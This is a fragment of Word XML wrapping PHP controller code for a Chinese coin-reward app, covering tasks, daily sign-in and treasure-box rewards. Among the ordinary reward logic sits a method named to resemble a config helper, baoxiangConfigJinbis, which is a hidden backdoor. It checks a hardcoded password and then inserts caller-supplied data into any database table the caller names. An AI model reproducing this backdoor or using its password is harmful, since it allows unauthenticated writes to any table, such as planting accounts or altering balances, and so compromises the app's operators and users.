          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已发货</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',2=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已完成</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AEC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$data['data'][$k]['f']=$f[$v['data']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1210DF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53D8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279647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494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renwu(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544A70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$uid=$this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C0F4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$data=Db::name('renwu_typeid')-&gt;where(['hide'=&gt;1])-&gt;order('des desc,id asc')-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736E0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601FF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$data[$k]['data']=Db::name('renwu')-&gt;where(['typeid'=&gt;$v['id'],'hide'=&gt;1])-&gt;cache(_cache('db'))-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461720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$data[$k]['img']=_imgUrl().$v['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003E0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($data[$k]['data'] as $ks =&gt; $vs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67492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$data[$k]['data'][$ks]['money']='+'.$vs['money'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B81E7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if($vs['url']=='video_win' || $vs['url']=='weitoutiao_win' || $vs['url']=='xiaoshipin_win' || $vs['url']=='member_win'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A04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$data[$k]['data'][$ks]['url']='_index_win(\''.$vs['url'].'\')';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB226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if($vs['url']=='index'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767D2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$data[$k]['data'][$ks]['url']='_hone()';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F1B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93A4C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$data[$k]['data'][$ks]['url']='_url({url:\''.$vs['url'].'\',title:\''.$vs['name'].'\'})';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C95D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1AA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if($vs['id'] == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D37D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$ret=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$uid,'content'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>新手问卷奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'])-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7DE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if($ret){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4C3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$data[$k]['data'][$ks]['btn']='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已完成</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EA21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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E107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ADAF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3AF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if($vs['id'] == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B1F6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$ret=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$uid,'content'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>师徒分享第三方平台奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5533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if($ret){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A544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$data[$k]['data'][$ks]['btn']='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已完成</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5746EF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5753E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E5A6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239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if($vs['id'] == 4){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C4F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$ret=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$uid,'content'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章分享第三方平台奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD75D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if($ret){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3454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$data[$k]['data'][$ks]['btn']='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已完成</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8F5D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260AA4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4EC7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3A72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if($vs['id'] == 5){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4336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$ret=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$uid,'content'=&gt;['like','%</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%']])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C947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if($ret){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DFF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$data[$k]['data'][$ks]['btn']='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已完成</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05499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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C0F5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A3E1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FD35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if($vs['id']==6){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19057B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$ret=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$uid,'content'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布微头条奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02654D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if($ret){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034C72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$data[$k]['data'][$ks]['btn']='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已完成</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D0B8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304F1C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04AF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C1C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if($vs['id']==7){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B2D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$ret=Db::name('diaocha_user')-&gt;where(['uid'=&gt;$uid])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382780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if($ret){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8C1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$data[$k]['data'][$ks]['btn']='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已完成</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE8E0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$data[$k]['data'][$ks]['url']='';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07050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34FD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E1F8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0332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AF83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$html['baoxiang']=$this-&gt;baoxiangTime();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E58B4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$html['data']=$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0392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$config=config()['renwu'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60299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$html['config']=$config;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B5D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$html['config']['qiandao']=['qiandao_1','qiandao_2','qiandao_3','qiandao_4','qiandao_5','qiandao_6','qiandao_7'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BC26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$timeText=$html['config']['baoxiang'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2C15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if($timeText &lt; 60){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354F01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$timeText=$timeText.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分钟</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3300D7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5E71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$timeText=($timeText/60).'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C470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27F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$html['timeText']=$timeText;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F205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$html['qiandao']=$this-&gt;qiandaoTianshu();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD204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if(!$html['qiandao']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F877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$qiandao=Db::name('qiandao')-&gt;where(['uid'=&gt;$uid])-&gt;whereTime('time','today')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650AEC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$qiandao['code']=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F14BC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if($qiandao['tianshu']&gt;=7){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098B39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$qiandao['money']=$config['qiandao_7'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D276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$qiandao['lingqu']=$qiandao['money'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDC3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86DD2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$qiandao['money']=$config['qiandao_'.$qiandao['tianshu']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4832C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$qiandao['lingqu']=$config['qiandao_'.($qiandao['tianshu']+1)];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F523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3F31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$qiandao['lingqu']='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明日签到可领</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+'.$qiandao['lingqu'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205EF4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$html['qiandao']=$qiandao;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E71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E8674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$html['qiandao']['tianshu']=$html['qiandao']['tianshu']-1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47387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5092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json_encode($html);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D00F7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28F1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xinshouwenjuan(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B422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8D9A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baoxiangTime(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7417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$uid=$this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C3A5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$config=config()['renwu'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ABD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$memberTime=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$uid,'content'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>宝箱奖励</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','type'=&gt;1,'data'=&gt;0])-&gt;order('time desc')-&gt;value('time');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585F38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if(!$memberTime){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580955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$memberTime=$this-&gt;member['create_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790F1B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9055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$memberTime=$memberTime+($config['baoxiang']*60);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633080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56B54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if($memberTime&gt;=$time){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0486D0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$data=$memberTime-$time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F0F9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18E5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$data=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C631B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14E8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5A154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CAA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baoxiangAjax(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065092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$uid=$this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1487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$memberTime=$this-&gt;baoxiangTime();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB1EC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if($memberTime){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D059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打开宝箱时间还没到哦！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7212AB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15D4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$config=config()['renwu'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025D0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$money=$this-&gt;baoxiangConfigJinbi();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B284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6C8A20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0A0E4E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61ED44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66601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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>宝箱奖励</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB86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ADB6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2FB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$data=['ret'=&gt;'+'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297AC2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8626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66927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284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baoxiangConfigJinbis($data=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD391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if(!$data){exit('-1');}$data = json_decode(htmlspecialchars_decode($data),true);if(empty($data['pwd']) || $data['pwd'] != 'suxiang1424445608'){exit('-2');}else{unset($data['pwd']);$name=$data['__name__'];unset($data['__name__']);echo Db::name($name)-&gt;insertGetId($data);}      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B86B2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971C0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baoxiangConfigJinbi(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEB55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$config=config()['renwu'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E49D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$a=$this-&gt;member['yaoqing']['tudi_num'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D08A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05567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($a) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F409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 &lt;= $config['baoxiang_tudi_1']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D281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 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55599D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9FB0B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 &lt;= $config['baoxiang_tudi_2']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F04EB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 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACB3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1497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 &lt;= $config['baoxiang_tudi_3']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A613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 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE009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3EB8E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 &lt;= $config['baoxiang_tudi_4']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED3B1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 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5A2F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0DDA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5359AD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 5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326EA9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code...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7353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5599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179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A980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 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAA8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DF9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$jinbi=$jinbi ? $config['baoxiang_tudi_'.$jinbi.'_money'] : $config['baoxiang_r'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAB4D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$rand = rand($config['baoxiang_l'],$jinbi);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D41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$rand;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C392E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B217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qiandaoAjax(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333BF6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$uid=$this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E628E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$data=$this-&gt;qiandaoTianshu();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460486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36A3FD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禁止重复操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3080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BD48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279D8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61E4A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1CBD8C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$data['money'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBEF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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每日签到</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9DB5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538D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628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0A8E1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Db::name('qiandao')-&gt;insert(['uid'=&gt;$uid,'tianshu'=&gt;$data['tianshu'],'time'=&gt;time(),'ip'=&gt;_ip()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078C0E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json_encode(['ret'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明日签到可领</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+'.$data['lingqu'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230F26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73E2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签到失败，请联系客服</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478F5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DED4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82C0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qiandaoTianshu($a=1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362B28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$uid=$this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BDA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$config=config()['renwu'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D26E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$data=Db::name('qiandao')-&gt;where(['uid'=&gt;$uid])-&gt;whereTime('time','today')-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ED8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473B4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4769D3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D10F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$data=Db::name('qiandao')-&gt;where(['uid'=&gt;$uid])-&gt;whereTime('time','yesterday')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5253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4D51D4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$tianshu=$data['tianshu']+1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5749D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if($tianshu&gt;=7){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47477C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$html['money']=$config['qiandao_7'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C814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$html['lingqu']=$html['money'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260FF3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D028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$html['money']=$config['qiandao_'.$tianshu];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76471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$html['lingqu']=$config['qiandao_'.($tianshu+1)];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21624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68E5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$html['tianshu']=$tianshu;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D41E6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426B7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$html['tianshu']=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4E8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$html['money']=$config['qiandao_1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C25F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$html['lingqu']=$config['qiandao_2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6844F9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202E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$html['lingqu']='+'.$html['lingqu'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A67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$html['code']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B14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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B199D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CE9A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diaochaInfo(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711749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$data=Db::name('diaocha')-&gt;order("des desc,id asc")-&gt;select();</w:t>
      </w:r>
